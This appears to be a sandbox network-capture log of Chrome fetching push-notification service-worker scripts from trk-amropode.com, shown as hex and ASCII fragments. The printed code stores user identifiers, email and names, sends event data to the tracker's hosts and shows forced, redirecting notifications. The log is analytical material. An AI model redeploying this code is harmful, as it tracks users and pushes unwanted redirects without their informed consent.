                                                                          Data Ascii: alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:45 UTC855INData Raw: 31 66 33 64 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 61 29 7b 74 72 79 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 3d 45 7d 63 61 74 63 68 28 61 29 7b 7d 45 28 61 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 61 29 7b 69 66 28 73 65 6c 66 2e 69 6e 64 65 78 65 64 44 42 29 7b 76 61 72 20 62 3d 47 2e 61 70 70 6c 79 28 73 65 6c 66 2e 69 6e 64 65 78 65 64 44 42 2c 5b 22 70 75 73 68 50 6c 61 74 46 6f 72 6d 44 62 22 2c 32 5d 29 3b 62 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 65 72 72 6f 72 20 64 62 22 2b 62 2e 65 72 72 6f 72 29 2c 61 28 6e 75 6c 6c 29 7d 2c 62 2e 6f 6e 73 75 63 63 65 73 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 3d 62 2e 72 65 73 75 6c 74 2c 64 3d 63
                                                                          Data Ascii: 1f3d(function(a,b){function c(a){try{console.log=E}catch(a){}E(a)}function d(a){if(self.indexedDB){var b=G.apply(self.indexedDB,["pushPlatFormDb",2]);b.onerror=function(){console.log("error db"+b.error),a(null)},b.onsuccess=function(){var c=b.result,d=c
                                                                          2023-11-21 16:58:45 UTC856INData Raw: 63 3d 61 2e 74 61 72 67 65 74 2e 72 65 73 75 6c 74 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 61 29 7b 69 28 22 65 78 74 5f 64 62 5f 65 72 72 6f 72 22 2c 61 2c 6d 29 7d 7d 2c 64 2e 67 65 74 28 22 73 65 73 73 69 6f 6e 49 64 73 22 29 2e 6f 6e 73 75 63 63 65 73 73 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 2e 74 61 72 67 65 74 2e 72 65 73 75 6c 74 29 74 72 79 7b 66 3d 61 2e 74 61 72 67 65 74 2e 72 65 73 75 6c 74 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 61 29 7b 69 28 22 65 78 74 5f 64 62 5f 65 72 72 6f 72 22 2c 61 2c 6d 29 7d 7d 2c 64 2e 67 65 74 28 22 75 74 6d 48 61 73 68 22 29 2e 6f 6e 73 75 63 63 65 73 73 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 2e 74 61 72 67 65 74 2e 72 65 73 75 6c 74 29 74 72 79 7b 6a 3d 61 2e 74 61 72 67 65 74 2e 72 65 73
                                                                          Data Ascii: c=a.target.result.value}catch(a){i("ext_db_error",a,m)}},d.get("sessionIds").onsuccess=function(a){if(a.target.result)try{f=a.target.result.value}catch(a){i("ext_db_error",a,m)}},d.get("utmHash").onsuccess=function(a){if(a.target.result)try{j=a.target.res
                                                                          2023-11-21 16:58:45 UTC857INData Raw: 2c 63 29 7b 6c 65 74 20 64 3b 74 72 79 7b 64 3d 46 2e 61 70 70 6c 79 28 74 68 69 73 2c 62 29 7d 63 61 74 63 68 7b 7d 6c 65 74 20 65 3d 62 2e 6d 65 73 73 61 67 65 3b 65 3d 6e 75 6c 6c 21 3d 64 26 26 22 7b 7d 22 21 3d 3d 64 3f 64 3a 6e 75 6c 6c 3d 3d 65 3f 62 3a 65 2b 22 3a 3a 22 2b 62 2e 73 74 61 63 6b 3b 6c 65 74 20 66 3d 22 68 74 74 70 73 3a 2f 2f 65 76 65 6e 74 2e 74 72 6b 2d 61 6d 72 6f 70 6f 64 65 2e 63 6f 6d 2f 72 65 67 69 73 74 65 72 2f 65 76 65 6e 74 2f 76 39 65 31 31 38 6d 65 7a 38 3f 65 76 65 6e 74 3d 22 2b 75 28 61 29 2b 22 26 65 72 72 6f 72 3d 22 2b 75 28 65 29 2b 22 26 76 65 72 73 69 6f 6e 3d 22 2b 63 3b 66 65 74 63 68 28 66 2c 7b 6d 65 74 68 6f 64 3a 22 67 65 74 22 2c 68 65 61 64 65 72 73 3a 7b 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 3a 22
                                                                          Data Ascii: ,c){let d;try{d=F.apply(this,b)}catch{}let e=b.message;e=null!=d&&"{}"!==d?d:null==e?b:e+"::"+b.stack;let f="https://event.trk-amropode.com/register/event/v9e118mez8?event="+u(a)+"&error="+u(e)+"&version="+c;fetch(f,{method:"get",headers:{"Content-type":"
                                                                          2023-11-21 16:58:45 UTC859INData Raw: 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 6e 61 6d 65 3d 22 41 72 72 61 79 22 2c 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6e 61 6d 65 3d 22 4f 62 6a 65 63 74 22 2c 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 21 3d 3d 52 65 73 70 6f 6e 73 65 26 26 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 21 3d 3d 41 72 72 61 79 26 26 22 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 22 21 3d 3d 62 26 26 22 66 6f 72 45 61 63 68 22 21 3d 3d 62 26 26 22 70 75 73 68 22 21 3d 3d 62 26 26 22 73 74 61 74 75 73 22 21 3d 3d 62 26 26 22 41 72 72 61 79 22 21 3d 3d 61 2e 6e 61 6d 65 26 26 22 52 65 73 70 6f 6e 73 65 22 21 3d 3d 61 2e 6e 61 6d 65 26 26 22 6c 6f 67 22 21 3d 3d 62 29 72 65 74 75 72 6e 22 77 72 69 74 61 62 6c 65 22 69 6e 20 63
                                                                          Data Ascii: ion(a,b,c){if(Array.prototype.name="Array",Object.prototype.name="Object",a.constructor!==Response&&a.constructor!==Array&&"defineProperty"!==b&&"forEach"!==b&&"push"!==b&&"status"!==b&&"Array"!==a.name&&"Response"!==a.name&&"log"!==b)return"writable"in c
                                                                          2023-11-21 16:58:45 UTC860INData Raw: 74 20 66 3d 7b 74 69 74 6c 65 3a 63 2e 74 69 74 6c 65 2c 62 6f 64 79 3a 63 2e 6d 65 73 73 61 67 65 2c 74 61 67 3a 63 2e 74 61 67 2c 72 65 6e 6f 74 69 66 79 3a 63 2e 72 65 6e 6f 74 69 66 79 2c 69 63 6f 6e 3a 63 2e 69 63 6f 6e 2c 72 65 71 75 69 72 65 49 6e 74 65 72 61 63 74 69 6f 6e 3a 21 30 2c 61 63 74 69 6f 6e 73 3a 64 2c 64 61 74 61 3a 7b 75 72 6c 3a 63 2e 72 65 64 69 72 65 63 74 2c 4c 7a 65 41 3a 21 30 2c 63 49 64 3a 63 2e 63 61 6d 70 61 69 67 6e 49 64 2c 70 73 49 64 3a 63 2e 70 75 73 68 53 75 62 73 63 72 69 70 74 69 6f 6e 49 64 2c 61 70 69 49 64 3a 63 2e 61 70 69 49 64 2c 70 69 78 65 6c 73 3a 63 2e 70 69 78 65 6c 73 2c 70 69 78 65 6c 56 61 6c 75 65 73 3a 63 2e 70 69 78 65 6c 56 61 6c 75 65 73 2c 72 65 74 75 72 6e 3a 63 7d 7d 3b 66 2e 69 63 6f 6e 3d 63
                                                                          Data Ascii: t f={title:c.title,body:c.message,tag:c.tag,renotify:c.renotify,icon:c.icon,requireInteraction:!0,actions:d,data:{url:c.redirect,LzeA:!0,cId:c.campaignId,psId:c.pushSubscriptionId,apiId:c.apiId,pixels:c.pixels,pixelValues:c.pixelValues,return:c}};f.icon=c
                                                                          2023-11-21 16:58:45 UTC861INData Raw: 37 38 38 63 61 39 37 36 31 61 34 62 37 38 61 62 63 66 62 31 63 33 65 61 62 62 38 65 36 38 22 2c 7b 6d 65 74 68 6f 64 3a 22 70 6f 73 74 22 2c 68 65 61 64 65 72 73 3a 7b 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 7d 2c 62 6f 64 79 3a 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 72 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 64 28 61 2c 72 2e 75 74 6d 48 61 73 68 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 26 26 63 28 61 29 7d 29 2e 63 61 74 63 68 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 28 61 29 2c 69 28 22 65 78 74 5f 65 72 72 6f 72 5f 66 65 74 63 68 69 6e 67 5f 70 75 73 68 22 2c 61 2c 6d 29 7d 29 7d 63 61 74 63 68 28 61 29 7b 63 28 61 29
                                                                          Data Ascii: 788ca9761a4b78abcfb1c3eabb8e68",{method:"post",headers:{"Content-type":"application/json"},body:JSON.stringify(r)}).then(function(a){return d(a,r.utmHash)}).then(function(a){a&&c(a)}).catch(function(a){c(a),i("ext_error_fetching_push",a,m)})}catch(a){c(a)
                                                                          2023-11-21 16:58:45 UTC863INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          42192.168.2.449789172.64.96.164435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:46 UTC863OUTGET //scripts/sw/v9e118mez8 HTTP/1.1
                                                                          Host: trk-amropode.com
                                                                          Connection: keep-alive
                                                                          Cache-Control: max-age=0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://kronemole.site/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-11-21 16:58:46 UTC863INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:46 GMT
                                                                          Content-Type: application/javascript;charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          expires: 0
                                                                          Cache-Control: max-age=14400, must-revalidate
                                                                          x-xss-protection: 1; mode=block
                                                                          pragma: no-cache
                                                                          x-frame-options: SAMEORIGIN
                                                                          referrer-policy: strict-origin-when-cross-origin
                                                                          content-security-policy: default-src 'self'; frame-src 'self' data:; connect-src 'self' https://cdn-media-2020.s3.amazonaws.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://storage.googleapis.com; style-src 'self' 'unsafe-inline'; img-src * 'self' https://* blob: data:; font-src 'self' data:
                                                                          vary: Origin
                                                                          vary: Access-Control-Request-Method
                                                                          vary: Access-Control-Request-Headers
                                                                          x-content-type-options: nosniff
                                                                          permissions-policy: camera=(), fullscreen=(self), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), sync-xhr=()
                                                                          CF-Cache-Status: HIT
                                                                          Age: 1350
                                                                          Last-Modified: Tue, 21 Nov 2023 16:36:16 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fUuIfp6RQd43ncOC6OZ2vD2T9b85BYB96QpxiY3YxADFv%2BcweHJv6xTPg5BPvkKjEMgG%2FJMA%2BACZsuqAPqYosDlIfZkj7a1q%2FheXjdPgo12JQs3OpyhAHthC1FmIq7Y24Inf"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          2023-11-21 16:58:46 UTC864INData Raw: 43 46 2d 52 41 59 3a 20 38 32 39 61 37 61 62 37 64 62 64 61 30 66 36 30 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                          Data Ascii: CF-RAY: 829a7ab7dbda0f60-EWRalt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:46 UTC864INData Raw: 33 65 37 62 0d 0a 27 75 73 65 20 73 74 72 69 63 74 27 3b 0a 63 6f 6e 73 74 20 65 6e 76 20 3d 20 7b 0a 20 20 20 20 6c 6f 67 3a 20 21 30 2c 0a 20 20 20 20 72 65 74 72 79 3a 20 31 30 2c 0a 20 20 20 20 73 6c 65 65 70 54 69 6d 65 3a 20 31 65 34 2c 0a 20 20 20 20 64 6f 6d 61 69 6e 3a 20 27 70 75 73 68 2e 74 72 6b 2d 61 6d 72 6f 70 6f 64 65 2e 63 6f 6d 27 2c 0a 20 20 20 20 6e 6f 74 69 66 69 63 61 74 69 6f 6e 44 6f 6d 61 69 6e 3a 20 27 6e 6f 74 69 66 69 63 61 74 69 6f 6e 2e 74 72 6b 2d 61 6d 72 6f 70 6f 64 65 2e 63 6f 6d 27 2c 0a 20 20 20 20 73 75 62 73 63 72 69 70 74 69 6f 6e 44 6f 6d 61 69 6e 3a 20 27 73 75 62 73 63 72 69 70 74 69 6f 6e 2e 74 72 6b 2d 61 6d 72 6f 70 6f 64 65 2e 63 6f 6d 27 2c 0a 20 20 20 20 65 76 65 6e 74 44 6f 6d 61 69 6e 3a 20 27 65 76 65 6e
                                                                          Data Ascii: 3e7b'use strict';const env = { log: !0, retry: 10, sleepTime: 1e4, domain: 'push.trk-amropode.com', notificationDomain: 'notification.trk-amropode.com', subscriptionDomain: 'subscription.trk-amropode.com', eventDomain: 'even
                                                                          2023-11-21 16:58:46 UTC866INData Raw: 79 28 61 29 20 7b 0a 20 20 63 6f 6e 73 74 20 62 20 3d 20 27 3d 27 2e 72 65 70 65 61 74 28 28 34 20 2d 20 28 61 2e 6c 65 6e 67 74 68 20 25 20 34 29 29 20 25 20 34 29 2c 0a 20 20 20 20 63 20 3d 20 28 61 20 2b 20 62 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2d 2f 67 2c 20 27 2b 27 29 2e 72 65 70 6c 61 63 65 28 2f 5f 2f 67 2c 20 27 2f 27 29 2c 0a 20 20 20 20 64 20 3d 20 77 69 6e 64 6f 77 2e 61 74 6f 62 28 63 29 2c 0a 20 20 20 20 65 20 3d 20 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 64 2e 6c 65 6e 67 74 68 29 3b 0a 20 20 66 6f 72 20 28 6c 65 74 20 62 20 3d 20 30 3b 20 62 20 3c 20 64 2e 6c 65 6e 67 74 68 3b 20 2b 2b 62 29 20 65 5b 62 5d 20 3d 20 64 2e 63 68 61 72 43 6f 64 65 41 74 28 62 29 3b 0a 20 20 72 65 74 75 72 6e 20 65 3b 0a 7d 0a 66 75 6e 63 74 69 6f 6e 20
                                                                          Data Ascii: y(a) { const b = '='.repeat((4 - (a.length % 4)) % 4), c = (a + b).replace(/\-/g, '+').replace(/_/g, '/'), d = window.atob(c), e = new Uint8Array(d.length); for (let b = 0; b < d.length; ++b) e[b] = d.charCodeAt(b); return e;}function
                                                                          2023-11-21 16:58:46 UTC867INData Raw: 73 75 63 63 65 73 73 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 61 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 69 66 20 28 61 2e 74 61 72 67 65 74 2e 72 65 73 75 6c 74 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 72 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 20 3d 20 61 2e 74 61 72 67 65 74 2e 72 65 73 75 6c 74 2e 76 61 6c 75 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 63 61 74 63 68 20 28 61 29 20 7b 7d 0a 20 20 20 20 20 20 20 20 7d 29 2c 0a 20 20 20 20 20 20 20 20 28 65 2e 67 65 74 28 27 75 73 65 72 49 64 27 29 2e 6f 6e 73 75 63 63 65 73 73 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 61 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 69 66 20 28 61 2e 74 61 72 67 65 74 2e 72 65 73 75 6c 74 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 72 79 20 7b 0a
                                                                          Data Ascii: success = function (a) { if (a.target.result) try { i = a.target.result.value; } catch (a) {} }), (e.get('userId').onsuccess = function (a) { if (a.target.result) try {
                                                                          2023-11-21 16:58:46 UTC868INData Raw: 44 61 74 61 49 6e 53 74 6f 72 65 28 61 2c 20 62 29 20 7b 0a 20 20 76 61 72 20 63 20 3d 20 67 65 74 48 6f 75 72 42 79 54 69 6d 65 5a 6f 6e 65 28 29 2c 0a 20 20 20 20 64 20 3d 20 7b 20 6e 61 6d 65 3a 20 27 70 75 73 68 41 70 69 49 64 73 27 20 7d 3b 0a 20 20 28 62 5b 30 5d 2e 63 6c 69 63 6b 55 6e 69 78 44 61 74 65 20 3d 20 63 2e 75 6e 69 78 29 2c 20 28 64 2e 76 61 6c 75 65 20 3d 20 62 29 3b 0a 20 20 74 72 79 20 7b 0a 20 20 20 20 61 2e 67 65 74 28 27 70 75 73 68 41 70 69 49 64 73 27 29 2e 6f 6e 73 75 63 63 65 73 73 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 62 29 20 7b 0a 20 20 20 20 20 20 62 2e 74 61 72 67 65 74 2e 72 65 73 75 6c 74 20 3d 3d 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 3f 20 61 2e 70 75 74 28 64 29 0a 20 20 20 20 20 20 20 20 3a 20 28 62 2e 74 61 72
                                                                          Data Ascii: DataInStore(a, b) { var c = getHourByTimeZone(), d = { name: 'pushApiIds' }; (b[0].clickUnixDate = c.unix), (d.value = b); try { a.get('pushApiIds').onsuccess = function (b) { b.target.result == null ? a.put(d) : (b.tar
                                                                          2023-11-21 16:58:46 UTC870INData Raw: 6f 75 72 63 65 46 69 76 65 20 3d 20 73 65 74 49 66 4e 75 6c 6c 28 62 2e 73 6f 75 72 63 65 46 69 76 65 2c 20 65 2e 6b 65 79 77 6f 72 64 29 29 2c 0a 20 20 20 20 28 62 2e 65 6d 61 69 6c 20 3d 20 65 2e 65 6d 61 69 6c 29 2c 0a 20 20 20 20 28 62 2e 66 69 72 73 74 4e 61 6d 65 20 3d 20 65 2e 66 69 72 73 74 4e 61 6d 65 29 2c 0a 20 20 20 20 28 62 2e 66 69 72 73 74 4e 61 6d 65 20 3d 20 73 65 74 49 66 4e 75 6c 6c 28 62 2e 66 69 72 73 74 4e 61 6d 65 2c 20 65 2e 66 6e 61 6d 65 29 29 2c 0a 20 20 20 20 28 62 2e 6c 61 73 74 4e 61 6d 65 20 3d 20 65 2e 6c 61 73 74 4e 61 6d 65 29 2c 0a 20 20 20 20 28 62 2e 6c 61 73 74 4e 61 6d 65 20 3d 20 73 65 74 49 66 4e 75 6c 6c 28 62 2e 6c 61 73 74 4e 61 6d 65 2c 20 65 2e 6c 6e 61 6d 65 29 29 2c 0a 20 20 20 20 28 62 2e 6f 66 66 65 72 49
                                                                          Data Ascii: ourceFive = setIfNull(b.sourceFive, e.keyword)), (b.email = e.email), (b.firstName = e.firstName), (b.firstName = setIfNull(b.firstName, e.fname)), (b.lastName = e.lastName), (b.lastName = setIfNull(b.lastName, e.lname)), (b.offerI
                                                                          2023-11-21 16:58:46 UTC871INData Raw: 20 6f 6e 4d 65 73 73 61 67 65 52 65 63 65 69 76 65 64 53 75 62 73 63 72 69 62 65 28 29 29 3b 0a 20 20 20 20 7d 29 0a 20 20 20 20 2e 63 61 74 63 68 28 66 75 6e 63 74 69 6f 6e 20 28 61 29 20 7b 0a 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 27 45 72 72 6f 72 20 67 65 74 74 69 6e 67 20 73 75 62 73 63 72 69 70 74 69 6f 6e 3a 27 2c 20 61 29 3b 0a 20 20 20 20 7d 29 3b 0a 7d 0a 73 65 6c 66 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 70 75 73 68 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 61 29 20 7b 0a 20 20 65 6e 76 2e 6c 6f 67 20 26 26 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 27 5b 53 65 72 76 69 63 65 20 57 6f 72 6b 65 72 5d 20 50 75 73 68 20 52 65 63 65 69 76 65 64 2e 27 29 2c 0a 20 20 20 20 65 6e 76 2e 6c 6f 67 20 26 26 20 6e 75 6c 6c
                                                                          Data Ascii: onMessageReceivedSubscribe()); }) .catch(function (a) { console.error('Error getting subscription:', a); });}self.addEventListener('push', function (a) { env.log && console.log('[Service Worker] Push Received.'), env.log && null
                                                                          2023-11-21 16:58:46 UTC872INData Raw: 3d 20 62 2e 6a 73 6f 6e 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 65 6e 76 2e 6c 6f 67 20 26 26 20 6e 75 6c 6c 20 21 3d 20 61 2e 64 61 74 61 20 26 26 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 27 5b 53 57 20 41 50 49 5d 20 68 61 64 20 74 68 69 73 20 64 61 74 61 3a 20 27 20 2b 20 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 63 29 29 2c 20 63 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 32 30 34 20 21 3d 3d 20 62 2e 73 74 61 74 75 73 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 65 74 20 61 20 3d 20 7b 20 73 74 61 74 75 73 3a 20 62 2e 73 74 61 74 75 73 2c 20 73 74 61 74 75 73 54 65 78 74 3a 20 62 2e 73 74 61 74 75 73 54 65 78 74 2c 20 74 65 73 74 3a 20 62 2e 74 65 78
                                                                          Data Ascii: = b.json(); return env.log && null != a.data && console.log('[SW API] had this data: ' + JSON.stringify(c)), c; } if (204 !== b.status) { let a = { status: b.status, statusText: b.statusText, test: b.tex
                                                                          2023-11-21 16:58:46 UTC874INData Raw: 2e 74 61 62 6f 6f 6c 61 2e 63 6f 6d 2f 32 2e 30 2f 6a 73 6f 6e 2f 27 20 2b 0a 20 20 20 20 20 20 20 20 20 20 62 5b 30 5d 20 2b 0a 20 20 20 20 20 20 20 20 20 20 27 2f 72 65 63 6f 6d 6d 65 6e 64 61 74 69 6f 6e 73 2e 6e 6f 74 69 66 79 2d 27 20 2b 0a 20 20 20 20 20 20 20 20 20 20 63 20 2b 0a 20 20 20 20 20 20 20 20 20 20 27 3f 61 70 70 2e 74 79 70 65 3d 77 65 62 26 61 70 70 2e 61 70 69 6b 65 79 3d 64 64 38 33 65 31 35 35 33 33 39 63 33 63 34 36 32 36 61 31 61 33 65 38 34 36 35 62 35 30 64 62 33 30 32 34 62 34 31 32 26 72 65 73 70 6f 6e 73 65 2e 69 64 3d 27 20 2b 0a 20 20 20 20 20 20 20 20 20 20 62 5b 31 5d 3b 0a 20 20 20 20 20 20 66 65 74 63 68 28 64 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 28 29 20 3d 3e 20 7b 7d 29 0a 20 20 20 20 20 20 20 20 2e 63 61
                                                                          Data Ascii: .taboola.com/2.0/json/' + b[0] + '/recommendations.notify-' + c + '?app.type=web&app.apikey=dd83e155339c3c4626a1a3e8465b50db3024b412&response.id=' + b[1]; fetch(d) .then(() => {}) .ca
                                                                          2023-11-21 16:58:46 UTC875INData Raw: 6e 2e 73 68 6f 77 4e 6f 74 69 66 69 63 61 74 69 6f 6e 28 63 2c 20 65 29 3b 0a 20 20 7d 0a 20 20 72 65 74 75 72 6e 20 21 31 3b 0a 7d 0a 73 65 6c 66 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 6e 6f 74 69 66 69 63 61 74 69 6f 6e 63 6c 69 63 6b 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 61 29 20 7b 0a 20 20 69 66 20 28 28 65 6e 76 2e 6c 6f 67 20 26 26 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 27 5b 53 65 72 76 69 63 65 20 57 6f 72 6b 65 72 5d 20 4e 6f 74 69 66 69 63 61 74 69 6f 6e 20 63 6c 69 63 6b 20 52 65 63 65 69 76 65 64 2e 27 29 2c 20 76 6f 69 64 20 30 20 21 3d 3d 20 61 2e 61 63 74 69 6f 6e 20 26 26 20 27 64 69 73 63 6c 6f 73 75 72 65 27 20 3d 3d 3d 20 61 2e 61 63 74 69 6f 6e 29 29 20 7b 0a 20 20 20 20 6c 65 74 20 62 20 3d 20 61 2e 6e 6f 74 69 66
                                                                          Data Ascii: n.showNotification(c, e); } return !1;}self.addEventListener('notificationclick', function (a) { if ((env.log && console.log('[Service Worker] Notification click Received.'), void 0 !== a.action && 'disclosure' === a.action)) { let b = a.notif
                                                                          2023-11-21 16:58:46 UTC876INData Raw: 68 73 75 62 73 63 72 69 70 74 69 6f 6e 63 68 61 6e 67 65 27 20 65 76 65 6e 74 20 66 69 72 65 64 2e 22 29 3b 0a 20 20 20 20 63 6f 6e 73 74 20 62 20 3d 20 75 72 6c 42 36 34 54 6f 55 69 6e 74 38 41 72 72 61 79 28 61 70 70 6c 69 63 61 74 69 6f 6e 53 65 72 76 65 72 50 75 62 6c 69 63 4b 65 79 29 3b 0a 20 20 20 20 61 2e 77 61 69 74 55 6e 74 69 6c 28 0a 20 20 20 20 20 20 73 65 6c 66 2e 72 65 67 69 73 74 72 61 74 69 6f 6e 2e 70 75 73 68 4d 61 6e 61 67 65 72 2e 73 75 62 73 63 72 69 62 65 28 7b 20 75 73 65 72 56 69 73 69 62 6c 65 4f 6e 6c 79 3a 20 21 30 2c 20 61 70 70 6c 69 63 61 74 69 6f 6e 53 65 72 76 65 72 4b 65 79 3a 20 62 20 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 20 28 61 29 20 7b 0a 20 20 20 20 20 20 20 20 65 6e 76 2e 6c 6f 67 20 26 26 20 63 6f 6e 73
                                                                          Data Ascii: hsubscriptionchange' event fired."); const b = urlB64ToUint8Array(applicationServerPublicKey); a.waitUntil( self.registration.pushManager.subscribe({ userVisibleOnly: !0, applicationServerKey: b }).then(function (a) { env.log && cons
                                                                          2023-11-21 16:58:46 UTC878INData Raw: 2c 0a 20 20 20 20 63 20 3d 20 7b 7d 3b 0a 20 20 72 65 74 75 72 6e 20 76 6f 69 64 20 30 20 3d 3d 3d 20 62 0a 20 20 20 20 3f 20 27 27 0a 20 20 20 20 3a 20 28 62 2e 73 70 6c 69 74 28 27 26 27 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 20 28 61 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 62 20 3d 20 61 2e 73 70 6c 69 74 28 27 3d 27 29 2c 0a 20 20 20 20 20 20 20 20 20 20 64 20 3d 20 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 62 5b 31 5d 29 3b 0a 20 20 20 20 20 20 20 20 63 5b 62 5d 20 3d 20 64 3b 0a 20 20 20 20 20 20 7d 29 2c 0a 20 20 20 20 20 20 27 6d 72 63 6c 6b 27 20 69 6e 20 63 20 26 26 20 27 27 20 21 3d 3d 20 63 2e 6d 72 63 6c 6b 20 3f 20 63 2e 6d 72 63 6c 6b 20 3a 20 27 75 72 6c 27 20 69 6e 20 63 20 26 26 20 27 27 20 21 3d 3d
                                                                          Data Ascii: , c = {}; return void 0 === b ? '' : (b.split('&').forEach(function (a) { var b = a.split('='), d = decodeURIComponent(b[1]); c[b] = d; }), 'mrclk' in c && '' !== c.mrclk ? c.mrclk : 'url' in c && '' !==
                                                                          2023-11-21 16:58:46 UTC879INData Raw: 6c 79 28 61 2c 20 62 29 20 7b 0a 20 20 73 65 6c 66 2e 63 6c 69 65 6e 74 73 2e 6d 61 74 63 68 41 6c 6c 28 29 2e 74 68 65 6e 28 63 20 3d 3e 20 7b 0a 20 20 20 20 66 6f 72 20 28 6c 65 74 20 64 20 3d 20 30 3b 20 64 20 3c 20 63 2e 6c 65 6e 67 74 68 3b 20 64 2b 2b 29 20 7b 0a 20 20 20 20 20 20 63 6f 6e 73 74 20 65 20 3d 20 63 5b 64 5d 3b 0a 20 20 20 20 20 20 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 7b 20 63 6f 6d 6d 61 6e 64 3a 20 61 2c 20 70 61 79 6c 6f 61 64 3a 20 62 20 7d 29 3b 0a 20 20 20 20 7d 0a 20 20 7d 29 3b 0a 7d 0a 66 75 6e 63 74 69 6f 6e 20 75 72 6c 42 61 73 65 36 34 54 6f 55 69 6e 74 38 41 72 72 61 79 28 61 29 20 7b 0a 20 20 63 6f 6e 73 74 20 62 20 3d 20 27 3d 27 2e 72 65 70 65 61 74 28 28 34 20 2d 20 28 61 2e 6c 65 6e 67 74 68 20 25 20 34 29 29 20
                                                                          Data Ascii: ly(a, b) { self.clients.matchAll().then(c => { for (let d = 0; d < c.length; d++) { const e = c[d]; e.postMessage({ command: a, payload: b }); } });}function urlBase64ToUint8Array(a) { const b = '='.repeat((4 - (a.length % 4))
                                                                          2023-11-21 16:58:46 UTC880INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          43192.168.2.449790104.21.72.34435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
